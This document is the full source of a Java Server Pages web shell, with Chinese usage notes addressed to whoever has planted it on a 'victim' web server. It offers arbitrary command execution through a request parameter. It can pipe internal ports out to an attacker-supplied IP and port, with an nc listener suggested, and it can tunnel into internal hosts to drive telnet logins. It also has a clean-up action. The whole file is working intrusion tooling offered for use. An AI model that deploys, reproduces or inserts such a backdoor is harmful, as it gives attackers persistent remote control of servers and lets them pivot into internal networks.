<% /* * WEBSHELL.JSP * * Author: lovehacker * E-mail: wangyun188@hotmail.com * * 使用方法: * ]http://victim/webshell.jsp?[options] * options: * action=piped&remoteHost=&remotePort=&myIp=&myPort= * action=tunnel&remoteHost=&remotePort=&myPort= * action=login&username=&password=&myPort= * action=send&myShell=&myPort=&cmd= * action=close&myPort= * action=shell&cmd= * 例子: * action=piped&remoteHost= -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来(可以先用NC监听12345端口)。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口,而防火墙又未过滤该WEB服务器向外的连接。 * action=tunnel&remoteHost= -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。(原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能,但jsp功能有限实现起来较为复杂),适用于你控制的机器只开了80端口,并且防火墙不允许它访问Internet,而你又非常想访问它内网某主机的Telnet服务:-) * action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器,这一步才开始真正登陆,你要输入要telnet主机的正确的用户名密码才行喔,要不然谁也没办法。 * action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成,那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记,否则无法知道数据流什么时间该结束(一定要写对喔,否则嘿嘿,就麻烦罗)。cmd这个参数就是你要执行的命令了,比如:“which ssh”,建议你这样玩:myShell=lovehacker&cmd=ls -la;echo lovehacker。 * action=close&myPort= -- 你是退出了telnet登陆,但程序在主机上开放的端口还没关闭,所以你要再执行这个命令,现场打扫干净嘛。 * action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini * 程序说明: * 想通过jsp实现telnet代理的时候着实头痛了一把,每个请求都是一个新的线程,client socket去连接 * telnet服务只能批量命令,无法实现与用户的交互,后来想了个笨办法:把telnet的过程分步完成,接 * 收到tunnel命令后,先起两个线程,一个监听端口等待连接,一个先和远程服务器建立好端口连接并一 * 直不断开,这下server socket再一次一次的收数据,一次次的转发到远程服务器,就可以记录状态,实 * 现和用户的交互了,但总觉得这办法太笨,如果用JSP实现telnet代理功能,你有更好的办法的话请一定 * 要来信告诉我。 * 版权说明: * 本身实现Telnet的功能我也是在人家代码的基础上修改的,所以:版权没有,你可以任意修改、复制。 * 只是加了新功能别忘了Mail一份给我喔! * * */ %> <%@ page import="java.io.*" %> <%@ page import="java.net.*" %> <%@ page import="java.util.*" %> <%@ page import="java.awt.Dimension" %> <% class redirector implements Runnable { private redirector companion = null; private Socket localSocket, remoteSocket; private InputStream from; private OutputStream to; private byte[] buffer = new byte[4096]; public redirector(Socket local, Socket remote) { try { localSocket = local; remoteSocket = remote; from = localSocket.getInputStream(); to = remoteSocket.getOutputStream(); } catch(Exception e) {} } public void couple(redirector c) { companion = c; Thread listen = new Thread(this); listen.start(); } public void decouple() { companion = null; } public void run() { int count; try { while(companion != null) { if((count = from.read(buffer)) < 0) break; to.write(buffer, 0, count); } } catch(Exception e) {} try { from.close(); to.close(); localSocket.close(); remoteSocket.close(); if(companion != null) companion.decouple(); } catch(Exception io) {} } } class redirector1 implements Runnable { private redirector1 companion = null; private Socket localSocket, remoteSocket; private InputStream from; private OutputStream to; private byte[] buffer = new byte[4096]; public redirector1(Socket local, Socket remote) { try { localSocket = local; remoteSocket = remote; from = localSocket.getInputStream(); to = remoteSocket.getOutputStream(); } catch(Exception e) {} } public void couple(redirector1 c) { companion = c; Thread listen = new Thread(this); listen.start(); } public void decouple() { companion = null; } public void run() { String tmp = ""; int count; try { while(companion != null) { if((count = from.read(buffer)) < 0) break; tmp = new String(buffer); if(tmp.startsWith("--GoodBye--")) { from.close(); to.close(); remoteSocket.close(); localSocket.close(); System.exit(1); } to.write(buffer, 0, count); } } catch(Exception e) {} try { if(companion != null) companion.decouple(); } catch(Exception io) {} } } class piped implements Runnable { String remoteHost1,remoteHost2; int remotePort1, remotePort2; Thread listener, connection; public piped(String raddr1,int rport1, String raddr2, int rport2) { remoteHost1 = raddr1; remotePort1 = rport1; remoteHost2 = raddr2; remotePort2 = rport2; listener = new Thread(this); listener.setPriority(Thread.MIN_PRIORITY); listener.start(); } public void run() { Socket destinationSocket1 = null; Socket destinationSocket2 = null; try { destinationSocket1 = new Socket(remoteHost1,remotePort1); destinationSocket2 = new Socket(remoteHost2, remotePort2); redirector r1 = new redirector(destinationSocket1, destinationSocket2); redirector r2 = new redirector(destinationSocket2, destinationSocket1); r1.couple(r2); r2.couple(r1); } catch(Exception e) { try { DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream()); os.writeChars("Remote host refused connection.\n"); destinationSocket2.close(); } catch(IOException ioe) { } } } } class tunnel implements Runnable { String remoteHost; int localPort, remotePort; Thread listener, connection; ServerSocket server; public tunnel(int lport, String raddr, int rport) { localPort = lport; remoteHost = raddr; remotePort = rport; try { server = new ServerSocket(localPort); } catch(Exception e) {} listener = new Thread(this); listener.setPriority(Thread.MIN_PRIORITY); listener.start(); } public void run() { Socket destinationSocket = null; try{ destinationSocket = new Socket(remoteHost, remotePort); }catch(Exception e){} while(true) { Socket localSocket = null; try { localSocket = server.accept(); } catch(Exception e) { continue; } try { redirector1 r1 = new redirector1(localSocket, destinationSocket); redirector1 r2 = new redirector1(destinationSocket, localSocket); r1.couple(r2); r2.couple(r1); } catch(Exception e) { try { DataOutputStream os = new DataOutputStream(localSocket.getOutputStream()); os.writeChars("Remote host refused connection.\n"); localSocket.close(); } catch(IOException ioe) {} continue; } } } } class TelnetIO { public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; } private int debug = 0; private byte neg_state = 0; private final static byte STATE_DATA = 0; private final static byte STATE_IAC = 1; private final static byte STATE_IACSB = 2; private final static byte STATE_IACWILL = 3; private final static byte STATE_IACDO = 4; private final static byte STATE_IACWONT = 5; private final static byte STATE_IACDONT = 6; private final static byte STATE_IACSBIAC = 7; private final static byte STATE_IACSBDATA = 8; private final static byte STATE_IACSBDATAIAC = 9; private byte current_sb; private final static byte IAC = (byte)255; private final static byte EOR = (byte)239; private final static byte WILL = (byte)251; private final static byte WONT = (byte)252; private final static byte DO = (byte)253; private final static byte DONT = (byte)254; private final static byte SB = (byte)250; private final static byte SE = (byte)240; private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */ private final static byte TELOPT_EOR = (byte)25; /* end of record */ private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/ private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */ private final byte[] IACWILL = { IAC, WILL }; private final byte[] IACWONT = { IAC, WONT }; private final byte[] IACDO = { IAC, DO }; private final byte[] IACDONT = { IAC, DONT }; private final byte[] IACSB = { IAC, SB }; private final byte[] IACSE = { IAC, SE }; private final byte TELQUAL_IS = (byte)0; private final byte TELQUAL_SEND = (byte)1; private byte[] receivedDX; private byte[] receivedWX; private byte[] sentDX; private byte[] sentWX; private Socket socket; private BufferedInputStream is; private BufferedOutputStream os; //private StatusPeer peer = this; /* peer, notified on status */ public void connect(String address, int port) throws IOException { if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")"); socket = new Socket(address, port); is = new BufferedInputStream(socket.getInputStream()); os = new BufferedOutputStream(socket.getOutputStream()); neg_state = 0; receivedDX = new byte[256]; sentDX = new byte[256]; receivedWX = new byte[256]; sentWX = new byte[256]; } public void disconnect() throws IOException { if(debug > 0) System.out.println("TelnetIO.disconnect()"); if(socket !=null) socket.close(); } public void connect(String address) throws IOException { connect(address, 23); } //public void setPeer(StatusPeer obj) { peer = obj; } public int available() throws IOException { return is.available(); } public byte[] receive() throws IOException { int count = is.available(); byte buf[] = new byte[count]; count = is.read(buf); if(count < 0) throw new IOException("Connection closed."); if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count); buf = negotiate(buf, count); return buf; } public void send(byte[] buf) throws IOException { if(debug > 1) System.out.println("TelnetIO.send("+buf+")"); os.write(buf); os.flush(); } public void send(byte b) throws IOException { if(debug > 1) System.out.println("TelnetIO.send("+b+")"); os.write(b); os.flush(); } private void handle_sb(byte type, byte[] sbdata, int sbcount) throws IOException { if(debug > 1) System.out.println("TelnetIO.handle_sb("+type+")"); switch (type) { case TELOPT_TTYPE: if (sbcount>0 && sbdata[0]==TELQUAL_SEND) { String ttype; send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS); /* FIXME: need more logic here if we use * more than one terminal type */ Vector vec = new Vector(2); vec.addElement("TTYPE"); ttype = (String)notifyStatus(vec); if(ttype == null) ttype = "dumb"; byte[] bttype = new byte[ttype.length()]; ttype.getBytes(0,ttype.length(), bttype, 0); send(bttype); send(IACSE); } } } public Object notifyStatus(Vector status) { if(debug > 0) System.out.println("TelnetIO.notifyStatus("+status+")"); return null; } private byte[] negotiate(byte buf[], int count) throws IOException { if(debug > 1) System.out.println("TelnetIO.negotiate("+buf+","+count+")"); byte nbuf[] = new byte[count]; byte sbbuf[] = new byte[count]; byte sendbuf[] = new byte[3]; byte b,reply; int sbcount = 0; int boffset = 0, noffset = 0; Vector vec = new Vector(2); while(boffset < count) { b=buf[boffset++]; if (b>=128) b=(byte)((int)b-256); switch (neg_state) { case STATE_DATA: if (b==IAC) { neg_state = STATE_IAC; } else { nbuf[noffset++]=b; } break; case STATE_IAC: switch (b) { case IAC: if(debug > 2) System.out.print("IAC "); neg_state = STATE_DATA; nbuf[noffset++]=IAC; break; case WILL: if(debug > 2) System.out.print("WILL "); neg_state = STATE_IACWILL; break; case WONT: if(debug > 2) System.out.print("WONT "); neg_state = STATE_IACWONT; break; case DONT: if(debug > 2) System.out.print("DONT "); neg_state = STATE_IACDONT; break; case DO: if(debug > 2) System.out.print("DO "); neg_state = STATE_IACDO; break; case EOR: if(debug > 2) System.out.print("EOR "); neg_state = STATE_DATA; break; case SB: if(debug > 2) System.out.print("SB "); neg_state = STATE_IACSB; sbcount = 0; break; default: if(debug > 2) System.out.print( " " ); neg_state = STATE_DATA; break; } break; case STATE_IACWILL: switch(b) { case TELOPT_ECHO: if(debug > 2) System.out.println("ECHO"); reply = DO; vec = new Vector(2); vec.addElement("NOLOCALECHO"); notifyStatus(vec); break; case TELOPT_EOR: if(debug > 2) System.out.println("EOR"); reply = DO; break; default: if(debug > 2) System.out.println( "" ); reply = DONT; break; } if(debug > 1) System.out.println("<"+b+", WILL ="+WILL+">"); if ( reply != sentDX[b+128] || WILL != receivedWX[b+128] ) { sendbuf[0]=IAC; sendbuf[1]=reply; sendbuf[2]=b; send(sendbuf); sentDX[b+128] = reply; receivedWX[b+128] = WILL; } neg_state = STATE_DATA; break; case STATE_IACWONT: switch(b) { case TELOPT_ECHO: if(debug > 2) System.out.println("ECHO"); vec = new Vector(2); vec.addElement("LOCALECHO"); notifyStatus(vec); reply = DONT; break; case TELOPT_EOR: if(debug > 2) System.out.println("EOR"); reply = DONT; break; default: if(debug > 2) System.out.println( "" ); reply = DONT; break; } if ( reply != sentDX[b+128] || WONT != receivedWX[b+128] ) { sendbuf[0]=IAC; sendbuf[1]=reply; sendbuf[2]=b; send(sendbuf); sentDX[b+128] = reply; receivedWX[b+128] = WILL; } neg_state = STATE_DATA; break; case STATE_IACDO: switch (b) { case TELOPT_ECHO: if(debug > 2) System.out.println("ECHO"); reply = WILL; vec = new Vector(2); vec.addElement("LOCALECHO"); notifyStatus(vec); break; case TELOPT_TTYPE: if(debug > 2) System.out.println("TTYPE"); reply = WILL; break; case TELOPT_NAWS: if(debug > 2) System.out.println("NAWS"); vec = new Vector(2); vec.addElement("NAWS"); Dimension size = (Dimension) notifyStatus(vec); receivedDX[b] = DO; if(size == null) { /* this shouldn't happen */ send(IAC); send(WONT); send(TELOPT_NAWS); reply = WONT; sentWX[b] = WONT; break; } reply = WILL; sentWX[b] = WILL; sendbuf[0]=IAC; sendbuf[1]=WILL; sendbuf[2]=TELOPT_NAWS; send(sendbuf); send(IAC);send(SB);send(TELOPT_NAWS); send((byte) (size.width >> 8)); send((byte) (size.width & 0xff)); send((byte) (size.height >> 8)); send((byte) (size.height & 0xff)); send(IAC);send(SE); break; default: if(debug > 2) System.out.println( "" ); reply = WONT; break; } if ( reply != sentWX[128+b] || DO != receivedDX[128+b] ) { sendbuf[0]=IAC; sendbuf[1]=reply; sendbuf[2]=b; send(sendbuf); sentWX[b+128] = reply; receivedDX[b+128] = DO; } neg_state = STATE_DATA; break; case STATE_IACDONT: switch (b) { case TELOPT_ECHO: if(debug > 2) System.out.println("ECHO"); reply = WONT; vec = new Vector(2); vec.addElement("NOLOCALECHO"); notifyStatus(vec); break; case TELOPT_NAWS: if(debug > 2) System.out.println("NAWS"); reply = WONT; break; default: if(debug > 2) System.out.println( "" ); reply = WONT; break; } if ( reply != sentWX[b+128] || DONT != receivedDX[b+128] ) { send(IAC);send(reply);send(b); sentWX[b+128] = reply; receivedDX[b+128] = DONT; } neg_state = STATE_DATA; break; case STATE_IACSBIAC: if(debug > 2) System.out.println(""+b+" "); if (b == IAC) { sbcount = 0; current_sb = b; neg_state = STATE_IACSBDATA; } else { System.out.println("(bad) "+b+" "); neg_state = STATE_DATA; } break; case STATE_IACSB: if(debug > 2) System.out.println(""+b+" "); switch (b) { case IAC: neg_state = STATE_IACSBIAC; break; default: current_sb = b; sbcount = 0; neg_state = STATE_IACSBDATA; break; } break; case STATE_IACSBDATA: if (debug > 2) System.out.println(""+b+" "); switch (b) { case IAC: neg_state = STATE_IACSBDATAIAC; break; default: sbbuf[sbcount++] = b; break; } break; case STATE_IACSBDATAIAC: if (debug > 2) System.out.println(""+b+" "); switch (b) { case IAC: neg_state = STATE_IACSBDATA; sbbuf[sbcount++] = IAC; break; case SE: handle_sb(current_sb,sbbuf,sbcount); current_sb = 0; neg_state = STATE_DATA; break; case SB: handle_sb(current_sb,sbbuf,sbcount); neg_state = STATE_IACSB; break; default: neg_state = STATE_DATA; break; } break; default: if (debug > 2) System.out.println( "This should not happen: "+ neg_state+" " ); neg_state = STATE_DATA; break; } } buf = new byte[noffset]; System.arraycopy(nbuf, 0, buf, 0, noffset); return buf; } } class TelnetConnect { TelnetIO tio = new TelnetIO(); int port = 0; public TelnetConnect(int port) { this.port = port; } public void connect() { try { tio.connect("localhost",port); } catch(IOException e) {} } public void disconnect() { try{ tio.disconnect(); }catch(IOException e){} } private String wait(String prompt) { String tmp = ""; do { try { tmp += new String(tio.receive(), 0); }catch(IOException e) {} } while(tmp.indexOf(prompt) == -1); return tmp; } private byte[] receive() { byte[] temp = null; try{ temp = tio.receive(); }catch(IOException e){} return temp; } private String waitshell() { String tmp = ""; do { try { tmp += new String(tio.receive(), 0); } catch(IOException e) {} } while((tmp.indexOf("$") == -1)&&(tmp.indexOf("#") == -1)&&(tmp.indexOf("%") == -1)); return tmp; } private void send(String str) { byte[] buf = new byte[str.length()]; str.getBytes(0, str.length(), buf, 0); try { tio.send(buf); } catch(IOException e) {} } } %> <% String action = request.getParameter("action"); String cmd = request.getParameter("cmd"); String remoteHost = request.getParameter("remoteHost"); String myIp = request.getParameter("myIp"); String myPort = request.getParameter("myPort"); String remotePort = request.getParameter("remotePort"); String username = request.getParameter("username"); String password = request.getParameter("password"); String myShell = request.getParameter("myShell"); if(action.equals("shell")){ try { Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor();} catch (InterruptedException e) {} } catch (IOException e) {} }else if(action.equals("piped")){ piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort)); }else if(action.equals("tunnel")){ tunnel me = new tunnel(Integer.parseInt(myPort), remoteHost, Integer.parseInt(remotePort)); }else if(action.equals("login")){ TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort)); tc.connect(); out.print(tc.wait("login:")); tc.send(username+"\r"); out.print(tc.wait("Password:")); tc.send(password+"\r"); out.print(tc.waitshell()); tc.disconnect(); }else if(action.equals("send")){ TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort)); tc.connect(); tc.send(cmd+"\r"); if(!myShell.equals("logout")) out.print(tc.wait(myShell)); tc.disconnect(); }else if(action.equals("close")){ try{ Socket s = new Socket("",Integer.parseInt(myPort)); DataOutputStream dos = new DataOutputStream(s.getOutputStream()); PrintStream ps = new PrintStream(dos); ps.println("--GoodBye--"); ps.close(); dos.close(); s.close(); }catch(Exception e){} }else{ out.print("You Love Hacker Too?"); } %>